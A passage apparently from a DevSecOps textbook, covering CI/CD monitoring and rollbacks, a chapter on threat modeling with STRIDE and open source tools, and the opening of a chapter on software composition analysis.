• Sentry: A tool that provides error tracking to show real-time issues in applications. Like a medical team on standby during a match, Sentry instantly notifies developers of crashes or other critical issues, pinpointing the exact problem. • Alertmanager: A tool that provides an alerting facility. • FeedbackHub and UserVoice: These are platforms where users can suggest features, report issues, and give direct feedback about software or products. This is like post-match interviews with players and fans. Such platforms help developers understand user perspectives, needs, and pain points.

Feedback from multiple fronts While system metrics and error logs are invaluable, feedback is multi-dimensional: • End users: Direct feedback from users often provides insights that automated systems might miss. If a website feels slow to a user, it’s a problem, even if backend metrics look perfect. • Peer code reviews: Feedback isn’t just about system performance. In development teams, peer reviews of code provide insights, catch potential bugs, and improve overall code quality.

Modern practices and tools • Artificial intelligence for IT operations (AIOps): It uses artificial intelligence to automate and enhance IT operations, particularly monitoring and analysis. AIOps can sift through mountains of data, filter out noise, and highlight critical issues, like a security guard with superhuman observation skills. • ChatOps: Integrating monitoring tools with team communication platforms such as Slack or Microsoft Teams. If something goes wrong, the tool immediately notifies the team in their chat. It’s like getting a direct phone call when there’s an issue, ensuring quick reactions. • Tools such as Grafana, Elasticsearch, Logstash, Kibana (ELK Stack), and Splunk: These offer visual dashboards and advanced analytics, making it easier to visualize and understand system performance and issues.

Rollbacks Rollbacks are a safety mechanism in the software development world. They allow teams to quickly undo problematic changes, ensuring that users continue to have a reliable and consistent experience. By leveraging modern tools and practices, teams can perform rollbacks smoothly, minimizing disruptions and ensuring software resilience. If a new release has a critical issue, automation tools can quickly revert to a previous, stable version. If you realize a new cake flavor isn’t popular, you’d quickly switch back to baking the previous beloved flavor.

79

80

Continuous Integration and Continuous Deployment

Picture a child playing with building blocks and constructing a tower. If they add a block and the tower becomes unstable, they might remove that last block to stabilize it again. In the world of software, “rollbacks” are similar. If a recent change or update to software causes problems, a rollback restores the previous, stable version.

The importance of rollbacks • Safety net: Just as removing an unstable block can prevent the entire tower from collapsing, rollbacks can prevent minor software issues from escalating into significant outages. • Quick recovery: When things go south, every minute matters. Rollbacks offer a swift way to restore services while the problem is investigated in-depth. • User experience: Users expect consistent functionality. Rollbacks ensure that user experience isn’t compromised for extended periods.

Tools for rollbacks Let’s take a look at some of the important tools for implementing rollbacks: • Version control systems (such as Git): ‚ What are they? Git is like a digital diary of software changes. Each change is dated, and you can jump back to any date to see what the software looked like then. ‚ How do they help? Git allows developers to revert to previous code states. If a recent change causes a problem, developers can use Git to restore an earlier, stable version. • Database migration tools (such as Liquibase and Flyway): ‚ What are they? These tools manage changes and versions of a database schema, handle data migrations, stored procedures, and more. Think of them as diaries but for databases. ‚ How do they help? If a software rollback requires the database to be reverted, these tools can help undo recent changes and restore the database to a previous state. • Feature flags (such as LaunchDarkly and Split.io): ‚ What are they? A method to turn features on or off without changing the code. It’s like having a remote control for software features. ‚ How do they help? If a new feature causes issues, it can be turned off (rolled back) without altering the code or doing a full software deployment. • Container orchestration systems (such as Kubernetes): ‚ What are they? Systems that manage and organize software containers. It also handles scaling, load balancing, and the entire life cycle of containerized applications.

Automating the CI/CD pipeline

‚ How do they help? Kubernetes can quickly switch between different versions of software. If the new version has problems, Kubernetes can swiftly roll back to the previous version.

Rollback challenges • Data changes: If the software update also modified the database schema or data, rolling back the code might not be enough. The data might also need to be reverted, which can be complex. • Dependencies: Sometimes, other components or services depend on the new version, making rollbacks tricky. • Detection time: The longer it takes to detect a problem, the harder it can be to perform a rollback since more data and user interactions can accumulate.

Best practices for rollbacks • Canary releases and phased rollouts: Before performing a full-scale update, deploy the new version to a small subset of users or servers. If issues arise, a rollback will impact fewer users. It’s like tasting a spoonful of soup before serving it to everyone at the table. • Automated testing: Before rolling out, automated tests should run to catch significant issues. Think of it as having a robot taste-tester for the soup mentioned earlier – it ensures the basics are right before humans taste it. • Back up, back up, back up: Always back up data and configurations before updates. This practice is analogous to saving your work continuously while writing an important document. If something goes wrong, you don’t lose everything. • Monitor after deployment: Continuous monitoring post-deployment helps detect issues that might necessitate a rollback. It’s like having a surveillance camera; you can spot when things start going wrong.

Rollback considerations • Stateful services: For services that maintain a state, such as databases, rolling back might be more complex. It’s akin to trying to “unbake” a cake – not always straightforward. • Zero-downtime rollbacks: Achieving a rollback without causing system downtime is the gold standard. It ensures users face minimal disruption. Tools such as Kubernetes provide mechanisms for this, rolling back versions without taking services offline. • Communicate with stakeholders: If a rollback happens, especially in a customer-facing environment, clear communication is essential. Inform users about the issue, the decision to roll back, and any potential impacts.

81

82

Continuous Integration and Continuous Deployment

Potential pitfalls • Incomplete rollbacks: Sometimes, not everything gets rolled back correctly, leading to lingering issues. It’s like trying to clean up spilled milk; you might think you’ve cleaned it all, but then you step in a puddle you missed. • Over-reliance on rollbacks: While rollbacks are a safety net, they shouldn’t be the primary strategy for handling software releases. Over-relying on them can lead to complacency in testing and validation procedures. • Data loss or corruption: In cases where new deployments introduce changes to data structures, a rollback might result in data loss if not handled with caution.

The importance of a CI/CD pipeline The CI/CD pipeline is an integral part of modern software development and deployment processes. CI/CD pipelines are more than just a modern best practice – they’re an essential framework that empowers organizations to deliver high-quality software rapidly, efficiently, and reliably. As the tech landscape continues to evolve, the importance of CI/CD will only grow. Its importance is evident in several key areas: • Faster release cycles: ‚ Why it matters: In the competitive world of software, being able to quickly and efficiently release new features, updates, or fixes can give companies a significant edge ‚ CI/CD effect: By automating testing and deployment processes, CI/CD allows for more frequent releases • Increased quality and reliability: ‚ Why it matters: High-quality software enhances user satisfaction and trust. ‚ CI/CD effect: CI ensures that code is integrated regularly, but it doesn’t guarantee constant testing. Continuous testing is the practice that ensures constant testing. This catches bugs earlier in the development process, reducing the likelihood of defects reaching production. • Reduced manual errors: ‚ Why it matters: Human error, especially in manual deployment processes, can lead to defects, outages, or security vulnerabilities ‚ CI/CD effect: Automation minimizes the chance of manual mistakes, ensuring consistent deployment processes

The importance of a CI/CD pipeline

• Enhanced developer productivity: ‚ Why it matters: Developers should focus on what they do best – writing code. Manual, repetitive tasks can be a drain on their productivity and morale. ‚ CI/CD effect: By automating integration, testing, and deployment, developers can concentrate on coding, leading to faster development cycles and more innovation. • Immediate feedback: ‚ Why it matters: Feedback is crucial for continuous improvement. The sooner issues are identified, the quicker they can be addressed. ‚ CI/CD effect: Continuous testing and monitoring provide immediate feedback on code changes, making it easier for developers to rectify issues. • Cost-efficiency: ‚ Why it matters: Reducing the time and resources required for testing and deployment can lead to significant cost savings ‚ CI/CD effect: Automated pipelines reduce the need for manual intervention, lowering labor costs and speeding up development cycles • Scalability: ‚ Why it matters: As software projects grow, the complexities associated with integration, testing, and deployment also increase. ‚ CI/CD effect: Scaling CI/CD pipelines is not just about handling larger code bases. It’s also about handling more developers, more parallel tasks, and more complex workflows. • Enhanced collaboration: ‚ Why it matters: Modern software development often involves multiple teams (frontend, backend, QA, and so on), and efficient collaboration between them is crucial ‚ CI/CD effect: CI/CD encourages a DevOps culture, where Dev and Ops teams collaborate more closely, leading to smoother development and deployment processes • Rollbacks and risk mitigation: ‚ Why it matters: Sometimes, despite all precautions, issues make their way to production. Being able to address these efficiently is crucial. ‚ CI/CD effect: Automated deployment processes usually include provisions for quick rollbacks, allowing teams to revert to previous stable versions if problems arise.

83

84

Continuous Integration and Continuous Deployment

• Consistency across environments: ‚ Why it matters: Discrepancies between development, staging, and production environments can lead to unexpected behavior. ‚ CI/CD effect: CI/CD ensures that the same processes are applied across all environments, reducing “it works on my machine” issues. It doesn’t automatically eliminate environmental discrepancies. Proper containerization, configuration management, and environment parity practices are also essential.

Summary CI/CD is not just about delivering the “best” version but ensuring that the software delivery process is efficient, consistent, and reliable. It’s about integrating continuously and deploying (or delivering) continuously. It has a variety of benefits, as follows: • Faster release cycle: New features and fixes can be delivered to users more quickly • Improved quality and reliability: Automated testing reduces human error, ensuring that code is of high quality before it reaches users • Enhanced productivity: Automating repetitive processes means developers can focus on writing code • Rapid feedback: If there’s an issue, developers find out immediately and can address it quickly By automating the CI/CD pipeline, teams can ensure consistency and quality, release features more rapidly, address issues promptly, and reduce manual, error-prone tasks. In the next chapter, we will cover threat modeling and understand the importance and benefits of it. We will also learn how to perform threat modeling and integrate threat modeling into DevSecOps.

7 Threat Modeling Threat modeling involves examining applications through the eyes of an attacker to identify and highlight security flaws that could be exploited. This makes security a part of the culture, laying the groundwork for a DevSecOps workplace. Threat modeling also helps teams better understand each other’s roles, objectives, and pain points, resulting in a more collaborative and understanding organization. This chapter covers the free and open source tools used in threat modeling. Threat modeling involves identifying, evaluating, and addressing security threats to a system or application. This is one of the most critical aspects of the Software Development Life Cycle (SDLC) as it helps identify and address security issues early in the development process. This chapter examines threat modeling, covering its definition, benefits, and function. We will cover the following topics in this chapter: • What is threat modeling? • The importance of threat modeling in the software development life cycle • Why should we perform threat modeling? • Threat modeling techniques • Integrating threat modeling into DevSecOps • Open source threat modeling tools

What is threat modeling? Threat modeling allows us to identify, assess, and prioritize potential threats to a system or application. The idea behind threat modeling is to identify those areas in a system that are most vulnerable to attack, then determine the best ways to mitigate those vulnerabilities. Threat modeling can be used for various systems and applications, including software, hardware, networks, and physical infrastructure. It can help identify threats from external and internal sources, such as malicious hackers, employees, or even natural disasters.

86

Threat Modeling

Threat modeling is a structured approach to identifying, assessing, and prioritizing potential security threats to a system or application. It is a proactive approach to security, allowing developers and security teams to identify and address security risks early in the SDLC. Let’s imagine a situation where a software development team was tasked with building a new e-commerce website for a client. The website was designed to handle sensitive customer information such as credit card numbers and personal identification data. The development team knew that security was a top priority and that any security breaches could result in the loss of customer trust. Therefore, the team used threat modeling to identify and mitigate potential security risks. The process of threat modeling followed by the team was as follows: 1. Identify assets: The first step in the threat modeling process is to define the project’s scope and what needs to be protected, from proprietary code and physical hardware to user credentials (usernames and passwords) and personal user information (addresses and payment details). The team identified the assets that needed to be protected: primarily, customer data, the website’s code base, and the server hosting the website. 2. Create an architecture overview: Next, the team brainstormed potential threats to the system. They used the STRIDE model (https://owasp.org/www-community/Threat_ Modeling_Process#stride-threat--mitigation-techniques), which stands for spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege. The team identified several potential threats, including SQL injection attacks, Cross-Site Scripting (XSS) attacks, and brute-force attacks on the login page. 3. Identify threats: With the architectural understanding in hand, to enumerate potential threats, we can leverage STRIDE or an attack trees model: ‚ Spoofing: An attacker might try to impersonate a legitimate user ‚ Tampering: Data being transferred from the client to the server might be intercepted and altered ‚ Repudiation: Users might claim they didn’t perform a certain action when they actually did ‚ Information disclosure: Unprotected API endpoints might reveal sensitive user data ‚ Denial of service: The website might be flooded with requests, making it unavailable ‚ Elevation of privilege: An attacker might exploit a vulnerability to gain admin rights 4. Prioritize threats: Once the team identified potential threats, they assessed the likelihood and impact of each threat. Not all threats have the same level of risk, so the team needed to prioritize them based on factors such as potential impact, likelihood, and the criticality of the associated asset. A probability and impact score was assigned to each threat, prioritizing them based on severity. The SQL injection and XSS attacks were the most severe and required immediate attention.

The importance of threat modeling in the software development lifecycle

5. Define countermeasures: The team then identified countermeasures to mitigate each identified and prioritized threat. They implemented security controls such as input validation, output encoding, and parameterized queries to prevent SQL injection and XSS attacks. 6. Review and repeat: After implementing the countermeasures, the team tested the system to ensure adequate security controls. They conducted penetration testing and vulnerability scanning to identify any remaining security risks. Finally, the team deployed the website and monitored it for security breaches. They used security monitoring tools to detect unauthorized access attempts and indicators of malicious activity on the website. Thanks to the threat modeling process, the development team identified and mitigated potential security risks early in the development process. The website was deployed with robust security controls, and no security breaches or incidents were reported after deployment. The client was satisfied with the security of their website, and the development team’s reputation for security and trustworthiness was strengthened.

The importance of threat modeling in the software development lifecycle Threat modeling is an essential process in the design and development of systems and applications to ensure they’re secure and resilient against potential attacks. Threat modeling is a proactive approach to security. Instead of waiting for vulnerabilities to be exploited or discovered, organizations can anticipate potential avenues of attack and take steps to mitigate those risks from the outset. Here’s a recap of its importance: • Early identification of threats: Threat modeling helps to identify security vulnerabilities at the design phase, long before the code is written or systems are deployed. Addressing vulnerabilities early can be more cost-effective and less disruptive than mitigating them after deployment. • Informed decision-making: Threat modeling provides a systematic overview of the potential threats, allowing stakeholders to make informed decisions about security trade-offs, budget allocation, and risk acceptance. • Promotes a security mindset: Integrating threat modeling into the development process ensures that security is considered from the outset, fostering a security-first culture within the organization. • Documentation and communication: Threat models serve as a documented reference of potential threats and their mitigations. This documentation aids communication among diverse teams (e.g., development, security, and operations), ensuring everyone is on the same page regarding security considerations. • Regulatory and compliance benefits: For industries where regulatory compliance is a concern, threat modeling can help demonstrate due diligence in identifying and mitigating security risks.

87

88

Threat Modeling

• Enhanced incident response: A well-documented threat model can aid in incident response. If a breach or security incident occurs, having a clear understanding of the system’s threat landscape can guide and expedite the response process. • Adaptable to changing threats: Threat modeling is not a one-time process. As systems evolve and new threats emerge, the threat model can be updated, ensuring the organization remains adaptive and prepared. • Holistic view of security: While automated tools might catch specific vulnerabilities in code (such as a SQL injection flaw), threat modeling takes a holistic approach, looking at the entire system’s architecture and potential weaknesses. • Stakeholder involvement: It encourages collaboration between different stakeholders, such as developers, security experts, system architects, and business managers. This collaboration ensures a well-rounded view of threats and their potential business impact.

Why should we perform threat modeling? Threat modeling is an essential step in the software development and system design process, focusing on foreseeing and addressing potential vulnerabilities. Performing threat modeling has a myriad of advantages, and here’s why it should be integrated into the development life cycle: • Proactive approach to security: Rather than taking a reactive stance and waiting for vulnerabilities to be discovered or exploited, threat modeling allows you to anticipate potential threats and address them in advance. Example: Before deploying a web application, a threat model might identify that the application is susceptible to SQL injection. By catching this in the design phase, developers can write more secure code to prevent this well-known attack vector. • Cost-efficient: Addressing security issues early in the design or development phase is significantly cheaper than dealing with breaches or vulnerabilities after deployment. Example: If a major e-commerce platform experiences a data breach due to not having modeled and mitigated threats, the cost of damage control, brand reputation harm, and potential lawsuits can be astronomical compared to the resources needed for early-stage threat modeling. • Informed decision-making: Threat modeling provides a systematic overview of potential threats, allowing stakeholders to make well-informed decisions about security trade-offs, resource allocation, and risk acceptance. Example: When designing a cloud-based storage system, decision-makers might use threat modeling to decide whether the benefits of third-party integration outweigh the security risks. • Holistic security viewpoint: Threat modeling provides a comprehensive view of the entire system or application, ensuring that security is addressed from a holistic standpoint and not just in isolated pockets.

Threat modeling techniques

Example: A smart home device company might use threat modeling to understand how compromising one device could affect the entire home ecosystem. • Stakeholder communication: A well-documented threat model serves as a communicative tool, ensuring that developers, security teams, and business stakeholders are aligned on security priorities. Example: A bank planning to release a new mobile banking feature can use threat models to communicate to board members the various threats and the steps taken to mitigate them. • Regulatory compliance: For industries with stringent security requirements, threat modeling can demonstrate due diligence and help in ensuring compliance with regulatory standards. Example: Healthcare providers, subject to regulations such as HIPAA, can use threat modeling to ensure the confidentiality, integrity, and availability of patient data. • Improved incident response: Should a security incident occur, having a detailed threat model can help pinpoint vulnerabilities, understand attack vectors, and expedite remediation. Example: In the case of a DDoS attack on an online service, prior threat modeling can provide insights into potential weak points and allow the application of pre-established mitigation strategies.

Threat modeling techniques Threat modeling is the process of identifying, understanding, and addressing threats in a given system, application, or environment. It’s a key component of secure design and the SDLC. Here’s an overview of the primary threat modeling techniques: Brainstorming: • This is an informal technique where a group of stakeholders, ideally with diverse expertise, come together to discuss and identify potential threats to a system • Strengths: Flexible; can produce creative and unexpected insights • Limitations: As it is informal, it might miss certain threats or be biased based on the participants’ knowledge Attack trees: • A hierarchical model that outlines potential attacks on a system • Starts with a root, which is the ultimate goal of the attacker, branching down into various means to achieve that goal • Strengths: Provides a visual and systematic way to identify potential attacks • Limitations: Can become complex for large systems

89

90

Threat Modeling

Data Flow Diagrams (DFDs): • Graphical representations of how data moves through a system • Elements include processes, data stores, data flow, and external entities • Strengths: Visualizing the flow of data helps identify potential vulnerable points • Limitations: Doesn’t capture all types of threats; mainly focuses on data flow vulnerabilities STRIDE model: • STRIDE stands for spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege • Used to categorize threats in a system Let’s examine an example of using STRIDE to develop a threat model when developing an online voting system: ‚ Spoofing:  Threat: An attacker impersonates a legitimate voter to cast a vote  Mitigation: Implement strong user authentication mechanisms, such as two-factor authentication ‚ Tampering:  Threat: An attacker modifies the vote count  Mitigation: Implement integrity checks and digital signatures to validate data ‚ Repudiation:  Threat: A voter denies having cast a vote  Mitigation: Implement robust logging and auditing mechanisms to track actions ‚ Information disclosure:  Threat: An attacker gains unauthorized access to voters’ personal data  Mitigation: Encrypt sensitive data and limit data access to authorized personnel only ‚ Denial of Service:  Threat: Attackers overwhelm the voting system, making it unavailable  Mitigation: Use scalable infrastructure, rate-limiting, and distributed denial of service protection mechanisms

Integrating threat modeling into DevSecOps

‚ Elevation of privilege:  Threat: A normal user gains administrative rights and manipulates the system  Mitigation: Implement proper user role management, segregate duties, and regularly review user permissions These techniques can be used separately or in conjunction with each other to create a comprehensive threat model. The best approach often depends on the nature of the project, the team’s expertise, and the specific risks associated with the system or application.

Integrating threat modeling into DevSecOps Threat modeling is a critical practice that should be integrated seamlessly into the DevSecOps workflow to identify and mitigate security risks early in the SDLC. The following are the key phases of the SDLC and how threat modeling can be incorporated at each stage: • Pre-development phase • Design phase • Development phase • Testing phase • Deployment phase Let’s look at what these phases involve in detail.

Pre-development phase • Threat modeling kickoff: Before development starts, hold a threat modeling kickoff meeting involving cross-functional teams, including developers, security experts, architects, and business stakeholders. Discuss the scope of the project, identify potential threats, and set security objectives. • Asset identification: Identify critical assets, data flows, and potential attack vectors for the application or system under development. This initial understanding lays the foundation for the subsequent threat modeling phases. Example: In a web application development project, critical assets to be identified may include user authentication data, sensitive customer information, and payment processing functionalities.

Design phase • Threat model creation: Create a threat model that outlines potential threats, attack vectors, and security controls for the application’s design. Utilize threat modeling methodologies such as STRIDE or DREAD to categorize and assess threats.

91

92

Threat Modeling

• Attack surface analysis: Analyze the application’s attack surface to identify entry points and potential vulnerabilities. Document the attack surface as diagrams or representations to visualize potential threats. Example: For a mobile banking app, attack surface analysis in the design phase may identify potential threats such as data interception during transactions, insecure storage of user credentials, and unauthorized access to customer accounts.

Development phase • Secure coding guidelines: Provide developers with secure coding guidelines based on the threat model findings. These guidelines should address common vulnerabilities and best practices for secure code development. • Code reviews and static analysis: Incorporate security code reviews and static analysis tools into the development process to identify and fix security issues before the code is committed. Example: Developers working on an e-commerce platform can follow secure coding practices to prevent common vulnerabilities such as SQL injection or XSS during the development phase.

Testing phase • Dynamic Application Security Testing (DAST): Perform dynamic testing using tools such as ZAP or Burp Suite to simulate attacks to assess the application’s security posture. DAST runs the automated scans on the QA websites, which are ready to go to the production or internet and it gives a deep view on how an attacker would find issues on the production websites. • Penetration testing: Conduct penetration testing to simulate real-world attacks and validate the effectiveness of the security controls implemented. Example: During testing, a penetration test may uncover a privilege escalation vulnerability that was not detected during development.

Deployment phase • Security monitoring and incident response: Implement security monitoring and incident response capabilities to detect and respond to potential security incidents after deployment. • Threat modeling updates: Threat models should be continually updated to reflect changes in the application or system and adapt to emerging threats. Example: After deployment, monitoring tools could be used to detect a series of brute-force login attempts, prompting an incident response to mitigate the threat.

Open source threat modeling tools

Open source threat modeling tools There are a few open source threat modeling tools available that can help organizations identify, categorize, and address security threats in a systematic way. Here’s an overview of a few notable ones: • OWASP Threat Dragon (https://owasp.org/www-project-threat-dragon/) Details: An online and desktop threat modeling tool from the Open Web Application Security Project (OWASP). It allows for the creation of threat models with drag-and-drop components. Features: ‚ Supports both web-based and desktop-based environments ‚ Integrates with GitHub for versioning and storage ‚ Enables the creation of DFDs with a built-in threat and rule editor Impact: Helps to identify security threats early in the design phase. By integrating with the SDLC, it allows for continuous threat modeling. • Microsoft Threat Modeling Tool (https://learn.microsoft.com/en-us/azure/ security/develop/threat-modeling-tool) Details: Although not strictly open source, Microsoft’s tool is freely available. It’s designed to guide users through the process of identifying and categorizing potential security threats. Features: ‚ Built-in templates for common architectures ‚ Integrates STRIDE categorization ‚ Offers guidance on mitigations Impact: It promotes a structured approach to threat modeling and helps integrate security considerations into the SDLC. • pytM (https://github.com/izar/pytm) Details: A Pythonic framework for threat modeling, allowing the definition of systems and components with Python scripts. Features: ‚ Script-based definitions allow for easy integration and automation ‚ Built-in data types that understand and prioritize common web application threats Impact: pytM helps streamline threat modeling for teams familiar with Python and can be integrated into existing Python-based toolchains. • SeaSponge (https://github.com/mozilla/seasponge)

93

94

Threat Modeling

Details: A graphical threat modeling tool produced as the outcome of an OWASP GSoC project. It allows users to create threat models using a graphical interface. Features: ‚ Graphical interface for drawing and visualizing architectures ‚ Built-in threat intelligence system to suggest potential threats Impact: Helps organizations visualize their systems and associated threats in an easy-to-digest manner.

How threat modeling tools help organizations The choice of threat modeling tool will depend on the specific requirements, expertise, and preferences of the organization. Open source tools, in particular, have the advantage of being adaptable and can be tailored to suit specific needs. Some of the benefits for organizations of using threat modeling tools are as follows: • Early threat detection: Threat modeling tools help organizations identify potential threats early in the design or development phase. This can reduce costs and risks by addressing vulnerabilities before they become larger issues. • Knowledge sharing: These tools often come with built-in threat libraries or intelligence. This can be an invaluable resource for teams unfamiliar with all the potential threats they may face. • Documentation: Having a documented threat model can serve as a reference for both development and security teams. It can help ensure that security considerations are consistently addressed across different projects and teams. • Integration with SDLC: By integrating threat modeling into the SDLC, organizations can promote a security culture and ensure that security considerations are not an afterthought.

Reasons some organizations don’t use threat modeling Threat modeling is a structured approach used by organizations to identify and address potential security threats and vulnerabilities in a system or application. While threat modeling is beneficial, not all organizations adopt it due to various reasons. Here are some reasons why organizations might not engage in threat modeling: • Lack of awareness: Some organizations might not be aware of the benefits of threat modeling or may not have encountered significant security issues in the past that would prompt them to adopt such practices. • Resource constraints: Threat modeling requires dedicated time, expertise, and sometimes tools. Smaller organizations or start-ups might prioritize other aspects of their business over investing in a thorough threat modeling process.

Summary

• Complexity: For large and complex systems, threat modeling can be an overwhelming task. Some organizations might feel that the effort required to model threats for such systems outweighs the benefits. .

• Skill gaps: Effective threat modeling requires specialized skills and expertise. Organizations might lack personnel with the necessary training or experience to conduct it. • Misplaced confidence: Some organizations might have an over-reliance on their existing security measures, believing that their current defenses are sufficient and that additional threat modeling is unnecessary. • Cost concerns: Engaging in regular threat modeling might be seen as an additional cost, especially if external consultants or tools are required. • Rapid development cycles: In environments where rapid development and deployment are prioritized, such as in some DevOps cultures, there might be a perception that threat modeling will slow down the process. • Lack of standardized processes: Unlike other security practices, threat modeling doesn’t have a one-size-fits-all approach. This can make it challenging for organizations to understand where to start or how to implement it effectively. • Belief in perimeter defense: Some organizations might still adhere to the outdated belief that a strong perimeter defense, such as firewalls and intrusion detection systems, is sufficient to protect them from threats. • Cultural barriers: In some organizational cultures, security might be seen as a hindrance to innovation or as a responsibility relegated only to the IT department. • Regulatory compliance focus: Organizations might focus solely on meeting regulatory compliance requirements rather than adopting a comprehensive approach to security. If threat modeling isn’t mandated by regulations, it might be overlooked.

Summary Threat modeling is an essential part of the SDLC. It helps to identify potential security vulnerabilities early in the development process, allowing developers to address them before the system is deployed. By identifying and mitigating security risks, threat modeling can help to improve an organization’s reputation for security and trustworthiness. Let’s quickly recap the importance of threat modeling: • Future-proofing: Cyber threats are evolving rapidly. By incorporating threat modeling, you’re not just addressing today’s threats; you’re also preparing for tomorrow’s. • Cost efficiency: It’s exponentially more cost-effective to address vulnerabilities during the design phase than to patch them after deployment.

95

96

Threat Modeling

• Trust and reputation: In an age where data breaches are headline news, maintaining the trust of your customers and stakeholders is paramount. • Compliance: Many industries have stringent regulatory requirements. Threat modeling can be the difference between compliance and costly penalties. Every organization, irrespective of size, should consider the following steps: • Educate and advocate: Ensure that your development, operations, and security teams understand the value and importance of threat modeling. • Integrate from the start: Incorporate threat modeling into the earliest stages of your SDLC. It’s not an add-on; it’s a foundational process. • Invest in tools and training: Leverage available open source or commercial threat modeling tools. Invest in training your teams to use them effectively. • Regularly review and update: The digital landscape and threat environment are dynamic. Regularly revisit and revise your threat models to adapt to new risks. • Foster collaboration: Break down silos. Encourage interdisciplinary collaboration between developers, security experts, and business stakeholders to ensure a comprehensive view of threats. As software becomes increasingly integral to business operations and everyday life, its security should not be an afterthought. It’s a critical business imperative. By integrating threat modeling into your software development process, you’re not just building software; you’re building trust, resilience, and a foundation for sustainable growth. Act now. Embrace threat modeling. Secure your organization’s future. In the next chapter, we will be covering software composition analysis.

8 Software Composition Analysis (SCA) Third-party dependencies are one of the biggest concerns when we deal with code. 80% to 90% of the software code contains third-party dependencies or libraries (reference: https://snyk.io/ reports/open-source-security). These dependencies come with their own issues and benefits. In this chapter, software composition analysis (SCA) and its uses will be discussed. We will also cover the free and open source tools surrounding SCA. We will cover the following topics: • What is SCA? • The importance of SCA • The benefits of SCA • Detecting security flaws • Discussing past breaches • Open source SCA tools

What is SCA? SCA is like a dedicated quality assurance team that covers security and compliance for your software’s ingredients. It ensures you’re building your software with the most up-to-date, safest, and compliant components available. This not only ensures a better end product but also saves you from potential headaches, be they security breaches or legal battles, down the road. Unlike in cooking, in software, using outdated or vulnerable components can have severe outcomes. Imagine you’re a chef preparing a large banquet. While you may grow some of your ingredients in your backyard garden (equivalent to the custom code you write), you’re also sourcing many ingredients from various markets and suppliers (akin to third-party or open source components). Now, just as you’d want to ensure that every ingredient is fresh, free from contamination, and ethically sourced, in software, you want to ensure every component is secure, updated, and compliant with licensing terms.

98

Software Composition Analysis (SCA)

SCA is like having a dedicated team in your kitchen that checks the following: • The freshness of your ingredients (ensuring software components are not outdated) • If there have been any recalls or contamination warnings about them (identifying known vulnerabilities) • The source and ethical implications of your ingredients (complying with licensing terms)

How does SCA work? We’ll continue with our chef analogy here: 1. Ingredient inventory: ‚ As you bring ingredients into your kitchen, the SCA team makes a detailed inventory ‚ In software terms, the SCA tool scans your software project to list all the third-party components and libraries you’re using 2. Freshness check: ‚ The team checks the freshness date on every ingredient. ‚ In software, the SCA tool verifies if you’re using the latest version of a component. Outdated components might have vulnerabilities that have been fixed in newer versions. 3. Health and safety check: ‚ The team consults a database of known food contaminations and recalls to ensure none of the ingredients are risky ‚ The SCA tool checks databases of known vulnerabilities, such as the National Vulnerability Database (NVD), to see if any of your software components have reported issues 4. Ethical and legal compliance: ‚ The team reviews the sourcing of each ingredient, ensuring it aligns with ethical standards and doesn’t breach any usage conditions. ‚ The SCA tool checks the licenses of third-party components to ensure compliance. Some open source licenses have strict terms, and violating them can lead to legal complications. 5. Remedial recommendations: ‚ If the team finds a stale ingredient or one from a questionable source, they suggest replacements or actions to take. ‚ Similarly, the SCA tool doesn’t just identify problems. It provides recommendations, such as updating a component to a safer version or replacing it with a more secure alternative.

What is SCA?

6. Continuous monitoring: ‚ The team doesn’t just check ingredients once. They continuously monitor supply chain news and updates. ‚ SCA tools also offer continuous monitoring, ensuring that if a vulnerability is discovered in the future in a component you’re using, you’re notified immediately.

SCA tools and their functionalities Software composition tools are automated software tools used to identify vulnerabilities in compiled binaries, third-party libraries, and components. SCA tools use a set of predefined rules and algorithms to scan the code and identify vulnerabilities that can be exploited by attackers: • Component identification: SCA tools can identify open source and third-party components within software applications. This includes direct and transitive dependencies. • Vulnerability detection: Scans software components against known vulnerability databases, such as the NVD, to highlight potential risks. • License compliance: Detects the licenses associated with open source components to ensure compliance with an organization’s licensing policies and to avoid potential legal complications. • Dependency mapping: Visualizes the dependencies within the application to show how components are interconnected and to highlight potential areas of risk. • Continuous monitoring: Continuously checks for new vulnerabilities or updates related to the open source components in a software application, often in real time or as new vulnerabilities are disclosed. • Policy enforcement: Allows organizations to set policies around the usage of open source components based on factors such as vulnerability severity, license type, or outdated components. The tool can then enforce these policies during development or CI/CD processes. • Remediation guidance: Provides actionable insights and recommendations on how to fix or mitigate identified vulnerabilities or license issues. • Integration with development and CI/CD tools: Seamlessly integrates with popular development environments, build systems, and CI/CD pipelines, enabling developers to get feedback instantly. • Historical tracking: Tracks the usage of components and vulnerabilities over time, which can benefit audit trails or understanding the evolution of a project’s risk profile. • Security reports and dashboards: Provides a centralized view of open source risks across projects, enabling security, legal, and development teams to make informed decisions.

99

100

Software Composition Analysis (SCA)

The importance of SCA In the intricate and interwoven world of software development, SCA tools act as vigilant guardians and advisors. They ensure that the components you’re weaving into your masterpiece are sound, safe, and compliant, helping to craft a final product that’s not only functional but also secure and legally unassailable. Imagine you’re putting together a massive jigsaw puzzle. Each piece you add is a piece of code or a component you’re using in your software project. Some of these puzzle pieces you craft yourself (your custom code), but many you get from various sets (open source libraries or third-party components) because why reinvent the wheel, right? Now, while using these pre-made pieces speeds things up and can bring in some fantastic artwork, there’s a risk: what if some of these pieces have defects, are outdated, or come with conditions on their usage? This is where SCA tools come into play. Let’s look at why they’re crucial. Vast landscape of open source components: • Just like a massive jigsaw puzzle with thousands of pieces, today’s software projects use a myriad of open source components. • It’s almost impossible to manually keep track of every component’s origin, its vulnerabilities, or its licensing restrictions. SCA tools act as your organized puzzle assistant, letting you know whether a piece is flawed or fits with your picture. Rapid discovery of vulnerabilities: • New security vulnerabilities in open source components are discovered daily. Without SCA, it’s like finding out way too late that one of your puzzle pieces is from a recalled batch with lead paint. • SCA tools continuously monitor known vulnerability databases, ensuring you’re alerted if a piece you’re using (or plan to use) is problematic. License compliance: • Every open source component comes with a license, and they’re not all created equal. Some might have conditions that conflict with your project’s objectives or commercial ambitions. • SCA is like that keen-eyed friend who, knowing you want to showcase your completed puzzle at an art gallery, reminds you which pieces have copyrights that might prevent that. Dependency transparency: • Modern software often involves layers upon layers of dependencies. You might add a piece to your puzzle, not realizing it brings along ten other pieces connected to it. • SCA tools help you see not only the primary components you’re using but also their transitive dependencies, ensuring you’re aware of the full picture.

The benefits of SCA

